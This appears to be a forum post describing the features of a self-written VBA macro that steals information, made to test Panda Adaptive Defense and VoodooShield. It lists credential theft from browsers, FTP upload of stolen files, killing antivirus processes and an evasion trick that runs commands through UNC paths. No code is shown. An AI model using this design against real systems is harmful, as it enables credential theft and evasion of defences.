Non-Malicious Info-Stealing Macro

Finally, I completed my own VBA codes for my own test against my favorite nextGen AV Panda Adaptive Defense and Voodooshield.

Here is the feature of my code:

1) Steal saved passwords in popular browsers like Chrome, Firefox and Opera.

2) Ability to steal through pendrive by opening a bogus or dummy doc on the victim's machine.

3) Ability to search for specific or targeted file/documents that might contain sensitive information such as password, company related info or personal informations.

4) No third-party tools used to increase stealth

5) Using Windows built-in FTP command to upload files to a file server

6) Ability to kill Antivirus processes - apparently Panda Adaptive Defense 360 processes are persistent.

7) Non-persistent techniques to ensure traces are gone right after the document is closed. All the work is done after the document is opened.

8) Uses command line through UNC path as it turns out that Voodooshield and Panda Adaptive Defense ignore command line executions through UNC. This might also be the same case against other Legacy and NextGen AV. Something that all the AV vendors need to look into.

Here is the video I made.

Unlike DDE method, Macro are still powerfull as a lot of the instructions can be done without downloading any scripts. Panda Adaptive Defense 360 can easily block any scripts from being downloaded and executed from any webservers. Problem is that my code does not even contain any malicious actions apart from "set source-copy to destination" and "prepare ftp connection, initiate and upload". That's it, what makes it malicious is the INTENTION and the TARGETTED DOCUMENTS and FILES.